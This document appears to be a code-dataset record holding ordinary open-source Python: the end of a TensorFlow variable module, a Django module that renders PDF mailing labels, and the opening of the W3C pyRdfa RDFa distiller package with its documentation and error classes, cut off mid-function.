ops.GraphKeys.MOVING_AVERAGE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.LOCAL_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.MODEL_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.GLOBAL_STEP,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.METRIC_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
@tf_export("__internal__.ops.is_resource_variable", v1=[])
def is_resource_variable(var):
""""Returns True if `var` is to be considered a ResourceVariable."""
return isinstance(var, BaseResourceVariable) or hasattr(
var, "_should_act_as_resource_variable")
def copy_to_graph_uninitialized(var):
"""Copies an existing variable to a new graph, with no initializer."""
# Like ResourceVariable.__deepcopy__, but does not set an initializer on the
# new variable.
# pylint: disable=protected-access
new_variable = UninitializedVariable(
trainable=var.trainable,
constraint=var._constraint,
shape=var.shape,
dtype=var.dtype,
name=var._shared_name,
synchronization=var.synchronization,
aggregation=var.aggregation,
extra_handle_data=var.handle)
new_variable._maybe_initialize_trackable()
# pylint: enable=protected-access
return new_variable
ops.NotDifferentiable("Assert")
ops.NotDifferentiable("VarIsInitializedOp")
ops.NotDifferentiable("VariableShape")
class VariableSpec(tensor_spec.DenseSpec):
"""Describes a tf.Variable."""
__slots__ = ["trainable"]
value_type = property(lambda self: BaseResourceVariable)
def __init__(self, shape, dtype=dtypes.float32,
name=None, trainable=True):
super(VariableSpec, self).__init__(shape, dtype=dtype, name=name)
self.trainable = trainable
def _to_components(self, value):
raise NotImplementedError
def _from_components(self, components):
raise NotImplementedError
def _from_compatible_tensor_list(self, tensor_list):
assert len(tensor_list) == 1
return tensor_list[0]
def __tf_tracing_type__(self, signature_context):
return signature_context.make_reference_type(self, id(self))
_pywrap_utils.RegisterType("VariableSpec", VariableSpec)
def write_object_proto_for_resource_variable(resource_variable, proto, options):
"""Writes additional information of the variable into the SavedObject proto.
This allows users to define a `hook` to provide extra information of the
variable to the SavedObject.
For example, the DistributedVariable class would fill in components in the
distributed context.
Args:
resource_variable: A `ResourceVariable` or `DistributedValue` that has the
information to be saved into the proto.
proto: `SavedObject` proto to update.
options: A `SaveOption` instance that configures save behavior.
"""
proto.variable.SetInParent()
if not resource_variable.name.endswith(":0"):
raise ValueError(f"Cowardly refusing to save variable "
f"{resource_variable.name} because of "
f"unexpected suffix in the name (':0') "
f"which won't be restored.")
proto.variable.name = meta_graph._op_name(resource_variable.name) # pylint: disable=protected-access
proto.variable.trainable = resource_variable.trainable
proto.variable.dtype = resource_variable.dtype.as_datatype_enum
proto.variable.synchronization = resource_variable.synchronization.value
proto.variable.aggregation = resource_variable.aggregation.value
proto.variable.shape.CopyFrom(resource_variable.shape.as_proto())
if options.experimental_variable_policy._save_variable_devices( # pylint: disable=protected-access
):
if hasattr(resource_variable, "device"):
proto.variable.device = resource_variable.device
|
the-stack_0_26016
|
# -*- coding: utf-8 -*-
#
# djangoplicity-contacts
# Copyright (c) 2007-2011, European Southern Observatory (ESO)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the European Southern Observatory nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL ESO BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE
#
"""
Module for generating labels in PDF documents. Relies on trml2pdf to generate the
PDFs. Works together with the ``Label`` class to define different labels.
Uses base templates to define specific types of label paper with a standard
layout for each label. The layout of each label can be overwritten. The standard
labels assume you are passing ``Contact`` models.
Usage::
>>> from djangoplicity.contacts.labels import LabelRender
>>> from djangoplicity.contacts.models import Contact
>>> queryset = Contacts.objects.all()[:100]
>>> l = LabelRender( 'a4-l7165' )
# Write a PDF file
>>> l.render_file( queryset, 'somefilename.pdf', outputdir='/path/to/somewhere/', extra_context={ 'title' : 'Some Title', 'author' : 'Some Author' } )
# Get a HTTP response with PDF file instead
>>> l.render_http_response( queryset, 'somefilename.pdf', extra_context={ 'title' : 'Some Title', 'author' : 'Some Author' } )
# Override default template layout and repeat each label 4 times.
>>> style = '{% include "contacts/labels/cool_label_style.rml" %}'
>>> template = '{% include "contacts/labels/cool_label.rml" %}'
>>> l = LabelRender( 'a4-l7165', label_template=template, style=style, repeat=4 )
# in the label template you have access to the variable ``obj`` which contains the
# current object instance for the label you are rendering:
>>> template = '...{{obj.email}}...'
When overriding templates, instead of including a template in a file, you can also just
directly define the django template in a string. This is used by the ``Label`` model to
define custom labels.
"""
from django.template import Context, Template
from django.utils.encoding import smart_str
from django.http import HttpResponse
import math
import os
try:
import trml2pdf
except ImportError:
trml2pdf = None
# Variable defines all possible paper types. For each paper type following properties
# are defined:
# * ``labels_no``: Number of labels per page
# * ``template``: The RML template for the paper type
# * ``label_template``: The default RML template file for layout of one label (the
# template file is included once for each label in template)
# * ``label_template_style``: The default extra RML stylesheet which may be needed
# by label_template
LABEL_PAPER = {
'a4-l7163': {
'title': 'A4 (L7163 - 99.1x38.1)',
'labels_no': 14,
'template': "contacts/labels/a4-l7163.rml",
'label_template': 'contacts/labels/standard_label_small.rml',
'label_template_style': 'contacts/labels/standard_label_small_style.rml',
},
'a4-l7165': {
'title': 'A4 (L7165 - 99.1x67.7)',
'labels_no': 8,
'template': "contacts/labels/a4-l7165.rml",
'label_template': 'contacts/labels/standard_label.rml',
'label_template_style': 'contacts/labels/standard_label_style.rml',
},
'us-letter-5162': {
'title': 'US Letter (5162 - 102x34)',
'labels_no': 14,
'template': "contacts/labels/usletter-5162.rml",
'label_template': 'contacts/labels/standard_label_small.rml',
'label_template_style': 'contacts/labels/standard_label_small_style.rml',
},
}
# Label paper choices for use as choices in a django field
LABEL_PAPER_CHOICES = tuple( [( k, v['title'] ) for k, v in LABEL_PAPER.items()] )
class LabelRender( object ):
"""
Class that renders labels from a queryset.
"""
def __init__( self, paper, label_template=None, style=None, repeat=1 ):
"""
Initialise template render.
* ``paper``: a key in LABEL_PAPER (required)
* ``label_template``: string with a django template to use instead of the default label template (optional)
* ``style``: string with a django template to use instead of the default label template style (optional)
* ``repeat``: the number of times to repeat each object in the query set.
"""
# Ensure trml2pdf is installed
if trml2pdf is None:
raise Exception( "Cannot generate PDF - trml2pdf is not installed." )
# Check paper type
if paper not in LABEL_PAPER:
raise Exception( "Label paper %s is not defined." )
# The render works by generating a template which looks like this:
# {% extends "contacts/labels/<papertype>.rml" %}
# {% block label_style %}<label_template_style>{% endblock %}
# {% block label0 %}<label_template>{% endblock %}
# {% block label1 %}<label_template>{% endblock %}
# ...
# {% block label<label_no-1> %}<label_template>{% endblock %}
#
# Hence, the <papertype>.rml template must naturally define these blocks:
# 1 block for the label_style
# X blocks for the individual labels on a page.
self.label_paper = LABEL_PAPER[paper]
self.document_template = """{%% extends "%s" %%}""" % self.label_paper['template']
if style:
self.document_template += u"""{%% block label_style %%}%s{%% endblock %%}""" % style
if label_template:
for i in range( self.label_paper['labels_no'] ):
self.document_template += u"""{%% block label%s %%}%s{%% endblock %%}""" % ( i, label_template )
self.document_template = Template( self.document_template )
self.repeat = repeat if int(repeat) > 0 else 1
def render( self, queryset, filename, extra_context={} ):
"""
Render PDF.
It is possible to supply extra context variables to the
templates via ``extra_context``. However, the following keys
are reserved:
* filename
* label_template
* label_template_style
* objects
For instance, most templates support these extra variables:
* title
* author
"""
# Repeat objects in queryset if needed.
if self.repeat > 1:
new_queryset = []
for obj in queryset:
new_queryset += [obj] * self.repeat
queryset = new_queryset
# Split queryset into lists of pages
list_count = int( math.ceil( float( len( queryset ) ) / self.label_paper['labels_no'] ) )
page_objects = []
for i in range( list_count ):
page_objects.append( queryset[i * self.label_paper['labels_no']:( i + 1 ) * self.label_paper['labels_no']] )
if len( page_objects[-1] ) != self.label_paper['labels_no']:
page_objects[-1] = page_objects[-1] + [None] * ( self.label_paper['labels_no'] - len( page_objects[-1] ) )
# Generate context
from django.conf import settings
extra_context.update( {
'filename': filename,
'label_template': self.label_paper['label_template'],
'label_template_style': self.label_paper['label_template_style'],
'objects': page_objects,
'MEDIA_ROOT': settings.MEDIA_ROOT,
'STATIC_ROOT': settings.STATIC_ROOT,
} )
# Generate RML template
rmldoc = self.document_template.render( Context( extra_context ) )
# Generate PDF
return trml2pdf.parseString( smart_str( rmldoc ) )
def render_http_response( self, queryset, filename, response=None, extra_context={} ):
"""
Write rendered PDF to a HttpResponse object.
"""
if response is None:
response = HttpResponse( content_type='application/pdf' )
response['Content-Disposition'] = 'attachment; filename=%s' % filename
response.write( self.render( queryset, filename, extra_context=extra_context ) )
return response
def render_file( self, queryset, filename, outputdir=None, extra_context={} ):
"""
Write rendered PDF to a file in a output directory.
"""
if outputdir is None:
outputdir = os.getcwd()
if not os.path.exists( outputdir ):
raise Exception( "Output directory does not exists" )
fullpath = os.path.join( outputdir, filename )
f = open( fullpath, 'w' )
f.write( self.render( queryset, filename, extra_context=extra_context ) )
f.close()
return fullpath
|
the-stack_0_26017
|
# -*- coding: utf-8 -*-
"""
RDFa 1.1 parser, also referred to as a “RDFa Distiller”. It is
deployed, via a CGI front-end, on the U{W3C RDFa 1.1 Distiller page<http://www.w3.org/2012/pyRdfa/>}.
For details on RDFa, the reader should consult the U{RDFa Core 1.1<http://www.w3.org/TR/rdfa-core/>}, U{XHTML+RDFa1.1<http://www.w3.org/TR/2010/xhtml-rdfa>}, and the U{RDFa 1.1 Lite<http://www.w3.org/TR/rdfa-lite/>} documents.
The U{RDFa 1.1 Primer<http://www.w3.org/TR/owl2-primer/>} may also prove helpful.
This package can also be downloaded U{from GitHub<https://github.com/RDFLib/pyrdfa3>}. The
distribution also includes the CGI front-end and a separate utility script to be run locally.
Note that this package is an updated version of a U{previous RDFa distiller<http://www.w3.org/2007/08/pyRdfa>} that was developed
for RDFa 1.0. Although it reuses large portions of that code, it has been quite thoroughly rewritten, hence put in a completely
different project. (The version numbering has been continued, though, to avoid any kind of misunderstandings. This version has version numbers "3.0.0" or higher.)
(Simple) Usage
==============
From a Python file, expecting a Turtle output::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename')
Other output formats are also possible. E.g., to produce RDF/XML output, one could use::
from pyRdfa import pyRdfa
print pyRdfa().rdf_from_source('filename', outputFormat='pretty-xml')
It is also possible to embed an RDFa processing. Eg, using::
from pyRdfa import pyRdfa
graph = pyRdfa().graph_from_source('filename')
returns an RDFLib.Graph object instead of a serialization thereof. See the description of the
L{pyRdfa class<pyRdfa.pyRdfa>} for further possible entry points details.
There is also, as part of this module, a L{separate entry for CGI calls<processURI>}.
Return (serialization) formats
------------------------------
The package relies on RDFLib. By default, it relies therefore on the serializers coming with the local RDFLib distribution. However, there has been some issues with serializers of older RDFLib releases; also, some output formats, like JSON-LD, are not (yet) part of the standard RDFLib distribution. A companion package, called pyRdfaExtras, is part of the download, and it includes some of those extra serializers. The extra format (not part of the RDFLib core) is U{JSON-LD<http://json-ld.org/spec/latest/json-ld-syntax/>}, whose 'key' is 'json', when used in the 'parse' method of an RDFLib graph.
Options
=======
The package also implements some optional features that are not part of the RDFa recommendations. At the moment these are:
- possibility for plain literals to be normalized in terms of white spaces. Default: false. (The RDFa specification requires keeping the white spaces and leave applications to normalize them, if needed)
- inclusion of embedded RDF: Turtle content may be enclosed in a C{script} element and typed as C{text/turtle}, U{defined by the RDF Working Group<http://www.w3.org/TR/turtle/>}. Alternatively, some XML dialects (e.g., SVG) allows the usage of RDF/XML as part of their core content to define metadata in RDF. For both of these cases pyRdfa parses these serialized RDF content and adds the resulting triples to the output Graph. Default: true.
- extra, built-in transformers are executed on the DOM tree prior to RDFa processing (see below). These transformers can be provided by the end user.
Options are collected in an instance of the L{Options} class and may be passed to the processing functions as an extra argument. E.g., to allow the inclusion of embedded content::
from pyRdfa.options import Options
options = Options(embedded_rdf=True)
print pyRdfa(options=options).rdf_from_source('filename')
See the description of the L{Options} class for the details.
Host Languages
==============
RDFa 1.1. Core is defined for generic XML; there are specific documents to describe how the generic specification is applied to
XHTML and HTML5.
pyRdfa makes an automatic switch among these based on the content type of the source as returned by an HTTP request. The following are the
possible host languages:
- if the content type is C{text/html}, the content is HTML5
- if the content type is C{application/xhtml+xml} I{and} the right DTD is used, the content is XHTML1
- if the content type is C{application/xhtml+xml} and no or an unknown DTD is used, the content is XHTML5
- if the content type is C{application/svg+xml}, the content type is SVG
- if the content type is C{application/atom+xml}, the content type is Atom
- if the content type is C{application/xml} or C{application/xxx+xml} (but 'xxx' is not 'atom' or 'svg'), the content type is XML
If local files are used, pyRdfa makes a guess on the content type based on the file name suffix: C{.html} is for HTML5, C{.xhtml} for XHTML1, C{.svg} for SVG, anything else is considered to be general XML. Finally, the content type may be set by the caller when initializing the L{pyRdfa class<pyRdfa.pyRdfa>}.
Beyond the differences described in the RDFa specification, the main difference is the parser used to parse the source. In the case of HTML5, pyRdfa uses an U{HTML5 parser<http://code.google.com/p/html5lib/>}; for all other cases the simple XML parser, part of the core Python environment, is used. This may be significant in the case of erroneous sources: indeed, the HTML5 parser may do adjustments on
the DOM tree before handing it over to the distiller. Furthermore, SVG is also recognized as a type that allows embedded RDF in the form of RDF/XML.
See the variables in the L{host} module if a new host language is added to the system. The current host language information is available for transformers via the option argument, too, and can be used to control the effect of the transformer.
Vocabularies
============
RDFa 1.1 has the notion of vocabulary files (using the C{@vocab} attribute) that may be used to expand the generated RDF graph. Expansion is based on some very simply RDF Schema and OWL statements on sub-properties and sub-classes, and equivalences.
pyRdfa implements this feature, although it does not do this by default. The extra C{vocab_expansion} parameter should be used for this extra step, for example::
from pyRdfa.options import Options
options = Options(vocab_expansion=True)
print pyRdfa(options=options).rdf_from_source('filename')
The triples in the vocabulary files themselves (i.e., the small ontology in RDF Schema and OWL) are removed from the result, leaving the inferred property and type relationships only (additionally to the “core” RDF content).
Vocabulary caching
------------------
By default, pyRdfa uses a caching mechanism instead of fetching the vocabulary files each time their URI is met as a C{@vocab} attribute value. (This behavior can be switched off setting the C{vocab_cache} option to false.)
Caching happens in a file system directory. The directory itself is determined by the platform the tool is used on, namely:
- On Windows, it is the C{pyRdfa-cache} subdirectory of the C{%APPDATA%} environment variable
- On MacOS, it is the C{~/Library/Application Support/pyRdfa-cache}
- Otherwise, it is the C{~/.pyRdfa-cache}
This automatic choice can be overridden by the C{PyRdfaCacheDir} environment variable.
Caching can be set to be read-only, i.e., the setup might generate the cache files off-line instead of letting the tool writing its own cache when operating, e.g., as a service on the Web. This can be achieved by making the cache directory read only.
If the directories are neither readable nor writable, the vocabulary files are retrieved via HTTP every time they are hit. This may slow down processing, it is advised to avoid such a setup for the package.
The cache includes a separate index file and a file for each vocabulary file. Cache control is based upon the C{EXPIRES} header of a vocabulary file’s HTTP return header: when first seen, this data is stored in the index file and controls whether the cache has to be renewed or not. If the HTTP return header does not have this entry, the date is artificially set to the current date plus one day.
(The cache files themselves are dumped and loaded using U{Python’s built in cPickle package<http://docs.python.org/release/2.7/library/pickle.html#module-cPickle>}. These are binary files. Care should be taken if they are managed by CVS: they must be declared as binary files when adding them to the repository.)
RDFa 1.1 vs. RDFa 1.0
=====================
Unfortunately, RDFa 1.1 is I{not} fully backward compatible with RDFa 1.0, meaning that, in a few cases, the triples generated from an RDFa 1.1 source are not the same as for RDFa 1.0. (See the separate U{section in the RDFa 1.1 specification<http://www.w3.org/TR/rdfa-core/#major-differences-with-rdfa-syntax-1.0>} for some further details.)
This distiller’s default behavior is RDFa 1.1. However, if the source includes, in the top element of the file (e.g., the C{html} element) a C{@version} attribute whose value contains the C{RDFa 1.0} string, then the distiller switches to a RDFa 1.0 mode. (Although the C{@version} attribute is not required in RDFa 1.0, it is fairly commonly used.) Similarly, if the RDFa 1.0 DTD is used in the XHTML source, it will be taken into account (a very frequent setup is that an XHTML file is defined with that DTD and is served as text/html; pyRdfa will consider that file as XHTML5, i.e., parse it with the HTML5 parser, but interpret the RDFa attributes under the RDFa 1.0 rules).
Transformers
============
The package uses the concept of 'transformers': the parsed DOM tree is possibly
transformed I{before} performing the real RDFa processing. This transformer structure makes it possible to
add additional 'services' without distoring the core code of RDFa processing.
A transformer is a function with three arguments:
- C{node}: a DOM node for the top level element of the DOM tree
- C{options}: the current L{Options} instance
- C{state}: the current L{ExecutionContext} instance, corresponding to the top level DOM Tree element
The function may perform any type of change on the DOM tree; the typical behaviour is to add or remove attributes on specific elements. Some transformations are included in the package and can be used as examples; see the L{transform} module of the distribution. These are:
- The C{@name} attribute of the C{meta} element is copied into a C{@property} attribute of the same element
- Interpreting the 'openid' references in the header. See L{transform.OpenID} for further details.
- Implementing the Dublin Core dialect to include DC statements from the header. See L{transform.DublinCore} for further details.
The user of the package may add these transformers to an L{Options} instance. Here is a possible usage with the “openid” transformer added to the call::
from pyRdfa.options import Options
from pyRdfa.transform.OpenID import OpenID_transform
options = Options(transformers=[OpenID_transform])
print pyRdfa(options=options).rdf_from_source('filename')
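A transformer itself is an ordinary Python function. A minimal, purely illustrative
sketch (the C{@data-prop} attribute used here is made up; the function simply copies
it into C{@property} on every element that carries it)::
    from pyRdfa.options import Options
    def copy_data_prop(node, options, state) :
        for elem in node.getElementsByTagName("*") :
            if elem.hasAttribute("data-prop") and not elem.hasAttribute("property") :
                elem.setAttribute("property", elem.getAttribute("data-prop"))
    options = Options(transformers=[copy_data_prop])
    print pyRdfa(options=options).rdf_from_source('filename')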
@summary: RDFa parser (distiller)
@requires: Python version 2.5 or up; 2.7 is preferred
@requires: U{RDFLib<http://rdflib.net>}; version 3.X is preferred.
@requires: U{html5lib<http://code.google.com/p/html5lib/>} for the HTML5 parsing.
@requires: U{httpheader<http://deron.meranda.us/python/httpheader/>}; however, a small modification had to be made to the original file, so for this reason and to make distribution easier this module (single file) is added to the package.
@organization: U{World Wide Web Consortium<http://www.w3.org>}
@author: U{Ivan Herman<a href="http://www.w3.org/People/Ivan/">}
@license: This software is available for use under the
U{W3C® SOFTWARE NOTICE AND LICENSE<href="http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231">}
@copyright: W3C
@var builtInTransformers: List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
@var CACHE_DIR_VAR: Environment variable used to define cache directories for RDFa vocabularies in case the default setting does not work or is not appropriate.
@var rdfa_current_version: Current "official" version of RDFa that this package implements by default. This can be changed at the invocation of the package
@var uri_schemes: List of registered (or widely used) URI schemes; used for warnings...
"""
"""
$Id: __init__.py,v 1.91 2013-10-16 11:48:54 ivan Exp $
"""
__version__ = "3.4.3"
__author__ = 'Ivan Herman'
__contact__ = 'Ivan Herman, [email protected]'
__license__ = 'W3C® SOFTWARE NOTICE AND LICENSE, http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231'
import sys
PY3 = (sys.version_info[0] >= 3)
if PY3 :
from io import StringIO
else :
from StringIO import StringIO
import os
import xml.dom.minidom
if PY3 :
from urllib.parse import urlparse
else :
from urlparse import urlparse
import rdflib
from rdflib import URIRef
from rdflib import Literal
from rdflib import BNode
from rdflib import Namespace
if rdflib.__version__ >= "3.0.0" :
from rdflib import RDF as ns_rdf
from rdflib import RDFS as ns_rdfs
from rdflib import Graph
else :
from rdflib.RDFS import RDFSNS as ns_rdfs
from rdflib.RDF import RDFNS as ns_rdf
from rdflib.Graph import Graph
import logging
logger = logging.getLogger(__name__)
# Namespace, in the RDFLib sense, for the rdfa vocabulary
ns_rdfa = Namespace("http://www.w3.org/ns/rdfa#")
from .extras.httpheader import acceptable_content_type, content_type
from .transform.prototype import handle_prototypes
# Vocabulary terms for vocab reporting
RDFA_VOCAB = ns_rdfa["usesVocabulary"]
# Namespace, in the RDFLib sense, for the XSD Datatypes
ns_xsd = Namespace('http://www.w3.org/2001/XMLSchema#')
# Namespace, in the RDFLib sense, for the distiller vocabulary, used as part of the processor graph
ns_distill = Namespace("http://www.w3.org/2007/08/pyRdfa/vocab#")
debug = False
#########################################################################################################
# Exception/error handling. Essentially, all the different exceptions are re-packaged into
# separate exception class, to allow for an easier management on the user level
class RDFaError(Exception) :
"""Superclass exceptions representing error conditions defined by the RDFa 1.1 specification.
It does not add any new functionality to the
Exception class."""
def __init__(self, msg) :
self.msg = msg
Exception.__init__(self)
class FailedSource(RDFaError) :
"""Raised when the original source cannot be accessed. It does not add any new functionality to the
Exception class."""
def __init__(self, msg, http_code = None) :
self.msg = msg
self.http_code = http_code
RDFaError.__init__(self, msg)
class HTTPError(RDFaError) :
"""Raised when HTTP problems are detected. It does not add any new functionality to the
Exception class."""
def __init__(self, http_msg, http_code) :
self.msg = http_msg
self.http_code = http_code
RDFaError.__init__(self,http_msg)
class ProcessingError(RDFaError) :
"""Error found during processing. It does not add any new functionality to the
Exception class."""
pass
class pyRdfaError(Exception) :
"""Superclass exceptions representing error conditions outside the RDFa 1.1 specification."""
pass
# Error and Warning RDFS classes
RDFA_Error = ns_rdfa["Error"]
RDFA_Warning = ns_rdfa["Warning"]
RDFA_Info = ns_rdfa["Information"]
NonConformantMarkup = ns_rdfa["DocumentError"]
UnresolvablePrefix = ns_rdfa["UnresolvedCURIE"]
UnresolvableReference = ns_rdfa["UnresolvedCURIE"]
UnresolvableTerm = ns_rdfa["UnresolvedTerm"]
VocabReferenceError = ns_rdfa["VocabReferenceError"]
PrefixRedefinitionWarning = ns_rdfa["PrefixRedefinition"]
FileReferenceError = ns_distill["FileReferenceError"]
HTError = ns_distill["HTTPError"]
IncorrectPrefixDefinition = ns_distill["IncorrectPrefixDefinition"]
IncorrectBlankNodeUsage = ns_distill["IncorrectBlankNodeUsage"]
IncorrectLiteral = ns_distill["IncorrectLiteral"]
# Error message texts
err_no_blank_node = "Blank node in %s position is not allowed; ignored"
err_redefining_URI_as_prefix = "'%s' is a registered or otherwise used URI scheme, but is defined as a prefix here; is this a mistake? (see, e.g., http://en.wikipedia.org/wiki/URI_scheme or http://www.iana.org/assignments/uri-schemes.html for further information on most of the URI schemes)"
err_xmlns_deprecated = "The usage of 'xmlns' for prefix definition is deprecated; please use the 'prefix' attribute instead (definition for '%s')"
err_bnode_local_prefix = "The '_' local CURIE prefix is reserved for blank nodes, and cannot be defined as a prefix"
err_col_local_prefix = "The character ':' is not valid in a CURIE Prefix, and cannot be used in a prefix definition (definition for '%s')"
err_missing_URI_prefix = "Missing URI in prefix declaration for '%s' (in '%s')"
err_invalid_prefix = "Invalid prefix declaration '%s' (in '%s')"
err_no_default_prefix = "Default prefix cannot be changed (in '%s')"
err_prefix_and_xmlns = "@prefix setting for '%s' overrides the 'xmlns:%s' setting; may be a source of problem if same file is run through RDFa 1.0"
err_non_ncname_prefix = "Non NCNAME '%s' in prefix definition (in '%s'); ignored"
err_absolute_reference = "CURIE Reference part contains an authority part: %s (in '%s'); ignored"
err_query_reference = "CURIE Reference query part contains an unauthorized character: %s (in '%s'); ignored"
err_fragment_reference = "CURIE Reference fragment part contains an unauthorized character: %s (in '%s'); ignored"
err_lang = "There is a problem with the language setting: either both xml:lang and lang are used on an element with different values, or, for (X)HTML5, only xml:lang is used."
err_URI_scheme = "Unusual URI scheme used in <%s>; might that be a mistake, e.g., the result of using an undefined CURIE prefix or an incorrect CURIE?"
err_illegal_safe_CURIE = "Illegal safe CURIE: %s; ignored"
err_no_CURIE_in_safe_CURIE = "Safe CURIE is used, but the value does not correspond to a defined CURIE: [%s]; ignored"
err_undefined_terms = "'%s' is used as a term, but has not been defined as such; ignored"
err_non_legal_CURIE_ref = "Relative URI is not allowed in this position (or not a legal CURIE reference) '%s'; ignored"
err_undefined_CURIE = "Undefined CURIE: '%s'; ignored"
err_prefix_redefinition = "Prefix '%s' (defined in the initial RDFa context or in an ancestor) is redefined"
err_unusual_char_in_URI = "Unusual character in uri: %s; possible error?"
#############################################################################################
from .state import ExecutionContext
from .parse import parse_one_node
from .options import Options
from .transform import top_about, empty_safe_curie, vocab_for_role
from .utils import URIOpener
from .host import HostLanguage, MediaTypes, preferred_suffixes, content_to_host_language
# Environment variable used to characterize cache directories for RDFa vocabulary files.
CACHE_DIR_VAR = "PyRdfaCacheDir"
# current "official" version of RDFa that this package implements. This can be changed at the invocation of the package
rdfa_current_version = "1.1"
# I removed schemes that would not appear as a prefix anyway, like iris.beep
# http://en.wikipedia.org/wiki/URI_scheme seems to be a good source of information
# as well as http://www.iana.org/assignments/uri-schemes.html
# There are some overlaps here, but better more than not enough...
# This comes from wikipedia
registered_iana_schemes = [
"aaa","aaas","acap","cap","cid","crid","data","dav","dict","dns","fax","file", "ftp","geo","go",
"gopher","h323","http","https","iax","icap","im","imap","info","ipp","iris","ldap", "lsid",
"mailto","mid","modem","msrp","msrps", "mtqp", "mupdate","news","nfs","nntp","opaquelocktoken",
"pop","pres", "prospero","rstp","rsync", "service","shttp","sieve","sip","sips", "sms", "snmp", "soap", "tag",
"tel","telnet", "tftp", "thismessage","tn3270","tip","tv","urn","vemmi","wais","ws", "wss", "xmpp"
]
# This comes from wikipedia, too
unofficial_common = [
"about", "adiumxtra", "aim", "apt", "afp", "aw", "bitcoin", "bolo", "callto", "chrome", "coap",
"content", "cvs", "doi", "ed2k", "facetime", "feed", "finger", "fish", "git", "gg",
"gizmoproject", "gtalk", "irc", "ircs", "irc6", "itms", "jar", "javascript",
"keyparc", "lastfm", "ldaps", "magnet", "maps", "market", "message", "mms",
"msnim", "mumble", "mvn", "notes", "palm", "paparazzi", "psync", "rmi",
"secondlife", "sgn", "skype", "spotify", "ssh", "sftp", "smb", "soldat",
"steam", "svn", "teamspeak", "things", "udb", "unreal", "ut2004",
"ventrillo", "view-source", "webcal", "wtai", "wyciwyg", "xfire", "xri", "ymsgr"
]
# These come from the IANA page
historical_iana_schemes = [
"fax", "mailserver", "modem", "pack", "prospero", "snews", "videotex", "wais"
]
provisional_iana_schemes = [
"afs", "dtn", "dvb", "icon", "ipn", "jms", "oid", "rsync", "ni"
]
other_used_schemes = [
"hdl", "isbn", "issn", "mstp", "rtmp", "rtspu", "stp"
]
uri_schemes = registered_iana_schemes + unofficial_common + historical_iana_schemes + provisional_iana_schemes + other_used_schemes
# List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
builtInTransformers = [
empty_safe_curie, top_about, vocab_for_role
]
#########################################################################################################
class pyRdfa :
"""Main processing class for the distiller
@ivar options: an instance of the L{Options} class
@ivar media_type: the preferred default media type, possibly set at initialization
@ivar base: the base value, possibly set at initialization
@ivar http_status: HTTP Status, to be returned when the package is used via a CGI entry. Initially set to 200, may be modified by exception handlers
"""
def __init__(self, options = None, base = "", media_type = "", rdfa_version = None) :
"""
@keyword options: Options for the distiller
@type options: L{Options}
@keyword base: URI for the default "base" value (usually the URI of the file to be processed)
		@keyword media_type: explicit setting of the preferred media type (a.k.a. content type) of the RDFa source
@keyword rdfa_version: the RDFa version that should be used. If not set, the value of the global L{rdfa_current_version} variable is used
"""
self.http_status = 200
self.base = base
if base == "" :
self.required_base = None
else :
self.required_base = base
self.charset = None
# predefined content type
self.media_type = media_type
if options == None :
self.options = Options()
else :
self.options = options
if media_type != "" :
self.options.set_host_language(self.media_type)
if rdfa_version is not None :
self.rdfa_version = rdfa_version
else :
self.rdfa_version = None
def _get_input(self, name) :
"""
		Tries to guess whether "name" is a URI or a string (for a file); it then tries to open this source accordingly,
returning a file-like object. If name is none of these, it returns the input argument (that should
be, supposedly, a file-like object already).
If the media type has not been set explicitly at initialization of this instance,
the method also sets the media_type based on the HTTP GET response or the suffix of the file. See
L{host.preferred_suffixes} for the suffix to media type mapping.
@param name: identifier of the input source
@type name: string or a file-like object
@return: a file like object if opening "name" is possible and successful, "name" otherwise
"""
try :
# Python 2 branch
isstring = isinstance(name, basestring)
except :
# Python 3 branch
isstring = isinstance(name, str)
try :
if isstring :
# check if this is a URI, ie, if there is a valid 'scheme' part
# otherwise it is considered to be a simple file
if urlparse(name)[0] != "" :
url_request = URIOpener(name)
self.base = url_request.location
if self.media_type == "" :
if url_request.content_type in content_to_host_language :
self.media_type = url_request.content_type
else :
self.media_type = MediaTypes.xml
self.options.set_host_language(self.media_type)
self.charset = url_request.charset
if self.required_base == None :
self.required_base = name
return url_request.data
else :
# Creating a File URI for this thing
if self.required_base == None :
self.required_base = "file://" + os.path.join(os.getcwd(),name)
if self.media_type == "" :
self.media_type = MediaTypes.xml
# see if the default should be overwritten
for suffix in preferred_suffixes :
